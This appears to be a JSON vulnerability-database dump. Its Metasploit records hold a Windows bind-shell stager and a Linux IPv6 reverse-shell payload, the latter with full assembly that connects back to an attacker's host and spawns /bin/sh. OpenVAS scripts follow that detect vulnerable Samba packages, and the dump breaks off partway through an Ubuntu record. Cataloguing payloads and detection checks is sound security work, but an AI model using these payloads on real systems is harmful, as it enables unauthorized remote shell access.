{"metasploit": [{"lastseen": "2019-11-24T21:31:32", "bulletinFamily": "exploit", "description": "Spawn a piped command shell (Windows x64) (staged). Listen for a connection\n", "modified": "2019-06-04T12:13:34", "published": "2019-06-03T22:06:53", "id": "MSF:PAYLOAD/WINDOWS/X64/SHELL/BIND_TCP_RC4", "href": "", "type": "metasploit", "title": "Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)", "sourceData": "# -*- coding: binary -*-\n##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/core/payload/windows/x64/bind_tcp_rc4'\n\n\nmodule MetasploitModule\n\n CachedSize = 616\n\n include Msf::Payload::Stager\n include Msf::Payload::Windows::BindTcpRc4_x64\n\n def self.handler_type_alias\n \"bind_tcp_rc4\"\n end\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Bind TCP Stager (RC4 Stage Encryption, Metasm)',\n 'Description' => 'Connect back to the attacker',\n 'Author' => ['hdm', 'skape', 'sf', 'mihi', 'max3raza', 'RageLtMan'],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Convention' => 'sockrdi',\n 'Stager' => { 'RequiresMidstager' => false }\n ))\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb"}, {"lastseen": "2019-11-30T11:35:04", "bulletinFamily": "exploit", "description": "Connect back to attacker and spawn a command shell over IPv6\n", "modified": "2018-07-23T18:38:25", "published": "2018-06-13T19:29:09", "id": "MSF:PAYLOAD/LINUX/X86/SHELL_REVERSE_TCP_IPV6", "href": "", "type": "metasploit", "title": "Linux Command Shell, Reverse TCP Inline (IPv6)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\n\nrequire 'msf/core/handler/reverse_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 158\n\n include Msf::Payload::Single\n include Msf::Payload::Linux\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Linux Command Shell, Reverse TCP Inline (IPv6)',\n 'Description' => 'Connect back to attacker and spawn a command shell over IPv6',\n 'Author' => 'Matteo Malvica <matteo[at]malvica.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Session' => Msf::Sessions::CommandShellUnix\n ))\n end\n\ndef generate_stage\n # tcp port conversion\n port_order = ([1,0]) # byte ordering\n tcp_port = [datastore['LPORT'].to_i].pack('n*').unpack('H*').to_s.scan(/../) # converts user input into integer and unpacked into a string array\n tcp_port.pop # removes the first useless / from the array\n tcp_port.shift # removes the last useless / from the array\n tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string.\n\n # ipv6 address conversion\n # converts user's input into ipv6 hex representation\n words = IPAddr.new(datastore['LHOST'], Socket::AF_INET6).hton.scan(/..../).map {|i| i.unpack('V').first.to_s(16)}\n payload_data =<<-EOS\n xor ebx,ebx\n mul ebx\n push 0x6\n push 0x1\n push 0xa\n mov ecx,esp\n mov al,0x66\n mov bl,0x1\n int 0x80\n mov esi,eax\n\n connect:\n xor ecx,ecx\n xor ebx,ebx\n push ebx\n push ebx\n push 0x#{words[3]}\n push 0x#{words[2]}\n push 0x#{words[1]}\n push 0x#{words[0]}\n push ebx\n push.i16 0x#{tcp_port}\n push.i16 0xa\n mov ecx, esp\n push.i8 0x1c\n push ecx\n push esi\n xor ebx,ebx\n xor eax,eax\n mov al,0x66\n mov bl,0x3\n mov ecx,esp\n int 0x80\n xor ebx,ebx\n cmp eax,ebx\n jne retry\n xor ecx,ecx\n mul ecx\n mov ebx,esi\n mov 
al,0x3f\n int 0x80\n xor eax,eax\n inc ecx\n mov ebx,esi\n mov al,0x3f\n int 0x80\n xor eax,eax\n inc ecx\n mov ebx,esi\n mov al,0x3f\n int 0x80\n xor edx,edx\n mul edx\n push edx\n push 0x68732f2f\n push 0x6e69622f\n mov ebx,esp\n push edx\n push ebx\n mov ecx,esp\n mov al,0xb\n int 0x80\n ret\n\n retry:\n xor ebx,ebx\n push ebx\n push.i8 0xa\n mul ebx\n mov ebx,esp\n mov al,0xa2\n int 0x80\n jmp connect\n ret\n\n exit:\n xor eax,eax\n mov al,0x1\n int 0x80\n EOS\n\n Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb"}], "openvas": [{"lastseen": "2019-05-29T18:32:25", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-04-10T00:00:00", "published": "2019-04-10T00:00:00", "id": "OPENVAS:1361412562310891754", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891754", "title": "Debian LTS Advisory ([SECURITY] [DLA 1754-1] samba security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891754\");\n script_version(\"2019-04-10T02:00:09+0000\");\n script_cve_id(\"CVE-2017-9461\", \"CVE-2018-1050\", \"CVE-2018-1057\", \"CVE-2019-3880\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-04-10 02:00:09 +0000 (Wed, 10 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-10 02:00:09 +0000 (Wed, 10 Apr 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1754-1] samba security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/04/msg00013.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1754-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the DLA-1754-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Various vulnerabilities were discovered in Samba, SMB/CIFS file, print,\nand login server/client for Unix\n\nCVE-2017-9461\n\nsmbd in Samba had a denial of service vulnerability (fd_open_atomic\ninfinite loop with high CPU usage and memory consumption) due to\nwrongly handling 
dangling symlinks.\n\nCVE-2018-1050\n\nSamba was vulnerable to a denial of service attack when the RPC\nspoolss service was configured to be run as an external daemon.\nMissing input sanitization checks on some of the input parameters to\nspoolss RPC calls could have caused the print spooler service to\ncrash.\n\nCVE-2018-1057\n\nOn a Samba 4 AD DC the LDAP server of Samba incorrectly validated\npermissions to modify passwords over LDAP allowing authenticated\nusers to change any other users' passwords, including administrative\nusers and privileged service accounts (eg Domain Controllers).\n\nThanks to the Ubuntu security team for having backported the rather\ninvasive changeset to Samba in Ubuntu 14.04 (which we could use to\npatch Samba in Debian jessie LTS).\n\nCVE-2019-3880\n\nA flaw was found in the way Samba implemented an RPC endpoint\nemulating the Windows registry service API. An unprivileged attacker\ncould have used this flaw to create a new registry hive file anywhere\nthey had unix permissions which could have led to creation of a new\nfile in the Samba share.\");\n\n script_tag(name:\"affected\", value:\"'samba' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n2:4.2.14+dfsg-0+deb8u12.\n\nWe recommend that you upgrade your samba packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ctdb\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libnss-winbind\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpam-smbpass\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = 
isdpkgvuln(pkg:\"libpam-winbind\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libparse-pidl-perl\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwbclient-dev\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"python-samba\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"registry-tools\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dbg\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dev\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-doc\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-libs\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-testsuite\", 
ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-vfs-modules\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"smbclient\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"winbind\", ver:\"2:4.2.14+dfsg-0+deb8u12\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:33:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-08-21T00:00:00", "id": "OPENVAS:1361412562310874976", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874976", "title": "Fedora Update for samba FEDORA-2018-bc22d6c7bc", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_bc22d6c7bc_samba_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for samba FEDORA-2018-bc22d6c7bc\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874976\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-08-21 06:55:59 +0200 (Tue, 21 Aug 2018)\");\n script_cve_id(\"CVE-2018-1139\", \"CVE-2018-1140\", \"CVE-2018-10858\", \"CVE-2018-10918\",\n \"CVE-2018-10919\", \"CVE-2018-1050\", \"CVE-2018-1057\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for samba FEDORA-2018-bc22d6c7bc\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"samba on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-bc22d6c7bc\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JLO2ZIZN3LCSYBMKQC6WDL5AJYSE2UG2\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.8.4~0.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:02", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-03-21T00:00:00", "id": "OPENVAS:1361412562310874251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874251", "title": "Fedora Update for samba FEDORA-2018-7d0acd608b", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_7d0acd608b_samba_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for samba FEDORA-2018-7d0acd608b\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874251\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-21 15:10:41 +0100 (Wed, 21 Mar 2018)\");\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for samba FEDORA-2018-7d0acd608b\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"samba on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-7d0acd608b\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3W6SCHFMINJOBDMPSQTSDO2ZG2AX67PC\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.6.14~0.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-03-15T00:00:00", "id": "OPENVAS:1361412562310874236", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874236", "title": "Fedora Update for samba FEDORA-2018-c5c651ac44", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_c5c651ac44_samba_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for samba FEDORA-2018-c5c651ac44\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874236\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-15 08:54:09 +0100 (Thu, 15 Mar 2018)\");\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for samba FEDORA-2018-c5c651ac44\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"samba on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-c5c651ac44\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/W4YHPBMSDW7MNTSL66Q2USGUGNTJKIW5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.7.6~0.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:54", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-03-15T00:00:00", "id": "OPENVAS:1361412562310874235", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874235", "title": "Fedora Update for libldb FEDORA-2018-c5c651ac44", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_c5c651ac44_libldb_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for libldb FEDORA-2018-c5c651ac44\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874235\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-15 08:54:04 +0100 (Thu, 15 Mar 2018)\");\n script_cve_id(\"CVE-2018-1050\", \"CVE-2018-1057\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libldb FEDORA-2018-c5c651ac44\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libldb'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libldb on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-c5c651ac44\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TSEA6GWWGBHUTR2IVCLHKI5VCXTHRA3U\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"libldb\", rpm:\"libldb~1.3.2~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-03-14T00:00:00", "id": "OPENVAS:1361412562310843469", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843469", "title": "Ubuntu Update for samba USN-3595-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3595_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for samba USN-3595-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843469\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-03-14 08:30:51 +0100 (Wed, 14 Mar 2018)\");\n script_cve_id(\"CVE-2018-1057\", \"CVE-2018-1050\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for samba USN-3595-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Björn Baumbach discovered that Samba\n incorrectly validated permissions when changing account passwords via LDAP. An\n authenticated attacker could use this issue to change the password of other\n users, including administrators, and perform actions as those users.\n (CVE-2018-1057) It was discovered that Samba incorrectly validated inputs to the\n RPC spoolss service. An authenticated attacker could use this issue to cause the\n service to crash, resulting in a denial of service. 
